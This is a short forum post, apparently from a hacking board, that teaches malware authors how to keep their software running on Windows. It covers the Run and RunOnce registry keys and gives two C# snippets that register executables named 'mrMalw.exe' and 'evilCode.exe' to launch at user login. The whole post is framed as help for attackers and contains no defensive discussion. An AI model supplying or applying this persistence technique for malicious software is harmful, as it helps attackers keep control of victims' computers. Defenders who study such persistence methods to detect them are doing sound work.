Keepin' Malware Alive on Windows with the Registry

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Keepin' Malware Alive on Windows with the Registry

Postby ltx_Lazzarus » Wed Apr 17, 2024 2:08 am

You can use the Windows registry keys to make sure your malware sticks around on Windows systems, thanks to the good ol' .NET.

Common keys:

- Loggin' In and Runnin': This key is the one you want to look at. It lets programs run every time a user logs in, which is perfect for keepin' your nasty little bugger alive and kicking:

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- One-Time Wonders: It's similar to the previous one, but the programs only run once when the user logs in. Might come in handy for certain types of attacks:

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Puttin' It into Practice:
Let's have a look at some C# console program examples to show you how to mess with these keys and keep your malware persistent.

- Example 1: Runnin' "mrMalw" on login:

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RegistryKey key = Registry.CurrentUser.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run", true);
key.SetValue("MalwareApp", @"C:\path\to\file\mrMalw.exe");

- Example 2: Runnin' "evilCode" once on login:

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RegistryKey key = Registry.CurrentUser.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\RunOnce", true);
key.SetValue("EvilApp", @"C:\path\to\file\evilCode.exe");

So, there ya have it, mate. Givin' your malware a fair go at stayin' on those Windows systems.

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